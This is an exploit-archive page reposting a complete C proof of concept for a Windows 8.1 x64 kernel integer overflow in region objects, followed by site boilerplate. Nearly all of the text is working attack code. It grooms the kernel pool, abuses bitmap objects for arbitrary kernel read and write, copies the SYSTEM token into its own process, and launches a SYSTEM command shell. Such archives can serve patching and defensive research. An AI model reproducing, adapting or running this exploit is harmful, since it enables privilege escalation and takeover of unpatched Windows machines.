Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010074

Below is a copy:

Microsoft Windows 8.1 (x64) RGNOBJ Integer Overflow#include <Windows.h>
#include <wingdi.h>
#include <stdio.h>
#include <winddi.h>
#include <time.h>
#include <stdlib.h>
#include <Psapi.h>
 
HANDLE hWorker, hManager;
BYTE *bits;
//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
typedef struct
{
    DWORD UniqueProcessIdOffset;
    DWORD TokenOffset;
} VersionSpecificConfig;
 
VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
 
 
void AllocateClipBoard2(unsigned int size) {
    BYTE *buffer;
    buffer = malloc(size);
    memset(buffer, 0x41, size);
    buffer[size - 1] = 0x00;
    const size_t len = size;
    HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
    memcpy(GlobalLock(hMem), buffer, len);
    GlobalUnlock(hMem);
    //OpenClipboard(0);
    //EmptyClipboard();
    SetClipboardData(CF_TEXT, hMem);
    //CloseClipboard();
    //GlobalFree(hMem);
}
 
 
 
 
static HBITMAP bitmaps[5000];
 
void fungshuei() {
    HBITMAP bmp;
    // Allocating 5000 Bitmaps of size 0xf80 leaving 0x80 space at end of page.
    for (int k = 0; k < 5000; k++) {
        //bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
        bmp = CreateBitmap(1670, 2, 1, 8, NULL);                                         // 1680  = 0xf80 1685 = 0xf90 allocation size 0xfa0
        bitmaps[k] = bmp;
    }
 
    HACCEL hAccel, hAccel2;
    LPACCEL lpAccel;
    // Initial setup for pool fengshui.  
    lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
    SecureZeroMemory(lpAccel, sizeof(ACCEL));
    // Allocating  7000 accelerator tables of size 0x40 0x40 *2 = 0x80 filling in the space at end of page.
    HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
    HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
    for (INT i = 0; i < 7000; i++) {
        hAccel = CreateAcceleratorTableA(lpAccel, 1);
        hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
        pAccels[i] = hAccel;
        pAccels2[i] = hAccel2;
    }
    // Delete the allocated bitmaps to free space at beiginig of pages
    for (int k = 0; k < 5000; k++) {
        DeleteObject(bitmaps[k]);
    }
    //allocate Gh04 5000 region objects of size 0xbc0 which will reuse the free-ed bitmaps memory.
    for (int k = 0; k < 5000; k++) {
        CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
    }
    // Allocate Gh05 5000 bitmaps which would be adjacent to the Gh04 objects previously allocated
    for (int k = 0; k < 5000; k++) {
        bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size  = 3c0
        bitmaps[k] = bmp;
    }
    // Allocate 17500 clipboard objects of size 0x60 to fill any free memory locations of size 0x60
    for (int k = 0; k < 1700; k++) { //1500
        AllocateClipBoard2(0x30);
    }
    // delete 2000 of the allocated accelerator tables to make holes at the end of the page in our spray.
    for (int k = 2000; k < 4000; k++) {
        DestroyAcceleratorTable(pAccels[k]);
        DestroyAcceleratorTable(pAccels2[k]);
    }
     
}
 
void SetAddress(BYTE* address) {
    for (int i = 0; i < sizeof(address); i++) {
        bits[0xdf0 + i] = address[i];
    }
    SetBitmapBits(hManager, 0x1000, bits);
}
void WriteToAddress(BYTE* data) {
    SetBitmapBits(hWorker, sizeof(data), data);
}
 
LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
    SetAddress((BYTE *)&src);
    return GetBitmapBits(hWorker, len, dst);
}
 
// Get base of ntoskrnl.exe
ULONG64 GetNTOsBase()
{
    ULONG64 Bases[0x1000];
    DWORD needed = 0;
    ULONG64 krnlbase = 0;
    if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
        krnlbase = Bases[0];
    }
    return krnlbase;
}
 
// Get EPROCESS for System process
ULONG64 PsInitialSystemProcess()
{
    // load ntoskrnl.exe
 
    ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
    // get address of exported PsInitialSystemProcess variable
    ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
    FreeLibrary((HMODULE)ntos);
    ULONG64 res = 0;
    ULONG64 ntOsBase = GetNTOsBase();
    // subtract addr from ntos to get PsInitialSystemProcess offset from base
    if (ntOsBase) {
        ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
    }
    return res;
}
 
// Get EPROCESS for current process
ULONG64 PsGetCurrentProcess()
{
    ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
 
     // walk ActiveProcessLinks until we find our Pid
    LIST_ENTRY ActiveProcessLinks;
    ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
 
    ULONG64 res = 0;
 
    while (TRUE) {
        ULONG64 UniqueProcessId = 0;
 
        // adjust EPROCESS pointer for next entry
        pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
        // get pid
        ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
        // is this our pid?
        if (GetCurrentProcessId() == UniqueProcessId) {
            res = pEPROCESS;
            break;
        }
        // get next entry
        ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
        // if next same as last, we reached the end
        if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
            break;
    }
    return res;
}
 
void main(int argc, char* argv[]) {
    HDC hdc = GetDC(NULL);
    HDC hMemDC = CreateCompatibleDC(hdc);
    HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
    HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
 
    static POINT points[0x3fe01];
 
    for (int l = 0; l < 0x3FE00; l++) {
        points[l].x = 0x5a1f;
        points[l].y = 0x5a1f;
    }
    points[2].y = 20;
    points[0x3FE00].x = 0x4a1f;
    points[0x3FE00].y = 0x6a1f;
 
    if (!BeginPath(hMemDC)) {
        fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
    }   
 
    for (int j = 0; j < 0x156; j++) {
        if (j > 0x1F && points[2].y != 0x5a1f) {
            points[2].y = 0x5a1f;
        }
        if (!PolylineTo(hMemDC, points, 0x3FE01)) {
            fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
        }
    }
 
    EndPath(hMemDC);
    //Kernel Pool Fung=Shuei
    fungshuei();
    //getchar();
     
    fprintf(stdout, "[+] Trigerring Exploit.\r\n");
    if (!FillPath(hMemDC)) {
            fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
        }
    printf("%s\r\n", "Done filling.");
 
    HRESULT res;
    VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!fake) {
        fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
    }
    memset(fake, 0x1, 0x100);
     
    bits = malloc(0x1000);
    memset(bits, 0x42, 0x1000);
    for (int k=0; k < 5000; k++) {
 
        res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
        if (res > 0x150) {
            fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
            hManager = bitmaps[k];
            hWorker = bitmaps[k + 1];
 
            // Get Gh05 header to fix overflown header.
            static BYTE Gh04[0x9];
            fprintf(stdout, "\r\nGh04 header:\r\n");
            for (int i = 0; i < 0x10; i++){
                Gh04[i] = bits[0x1d0 + i];
                fprintf(stdout, "%02x", bits[0x1d0 + i]);
            }
             
            // Get Gh05 header to fix overflown header.
            static BYTE Gh05[0x9];
            fprintf(stdout, "\r\nGh05 header:\r\n");
            for (int i = 0; i < 0x10; i++) {
                Gh05[i] = bits[0xd90 + i];
                fprintf(stdout, "%02x", bits[0xd90 + i]);
            }
 
            // Address of Overflown Gh04 object header
            static BYTE addr1[0x7];
            fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
            for (int j = 0; j < 0x8; j++) {
                addr1[j] = bits[0x210 + j];
                fprintf(stdout, "%02x", bits[0x210 + j]);
            }
            //Get pvscan0 address of second Gh05 object
            static BYTE* pvscan[0x07];
            fprintf(stdout, "\r\nPvsca0:\r\n");
            for (int i = 0; i < 0x8; i++) {
                pvscan[i] = bits[0xdf0 + i];
                fprintf(stdout, "%02x", bits[0xdf0 + i]);
            }
 
            // Calculate address to overflown Gh04 object header.
            addr1[0x0] = 0;
            int u = addr1[0x1];
            u = u - 0x10;
            addr1[1] = u;
             
            //Fix overflown Gh04 object Header
            SetAddress(addr1);
            WriteToAddress(Gh04);
 
            // Calculate address to overflown Gh05 object header.
            addr1[0] = 0xc0;
            int y = addr1[1];
            y = y + 0xb;
            addr1[1] = y;
 
            //Fix overflown Gh05 object Header
            SetAddress(addr1);
            WriteToAddress(Gh05);
 
            // get System EPROCESS
            ULONG64 SystemEPROCESS = PsInitialSystemProcess();
            //fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
            ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
            //fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
            ULONG64 SystemToken = 0;
            // read token from system process
            ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
            // write token to current process
            ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
            SetAddress((BYTE *)&CurProccessAddr);
             
            WriteToAddress((BYTE *)&SystemToken);
            // Done and done. We're System :)
            system("cmd.exe");
             
            break;
        }
        if (res == 0) {
            fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
        }
    }
    getchar();
    //clean up
    DeleteObject(bitobj);
    DeleteObject(bitmap);
    DeleteDC(hMemDC);
    ReleaseDC(NULL, hdc);
    VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
    //free(points);
     
}


Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.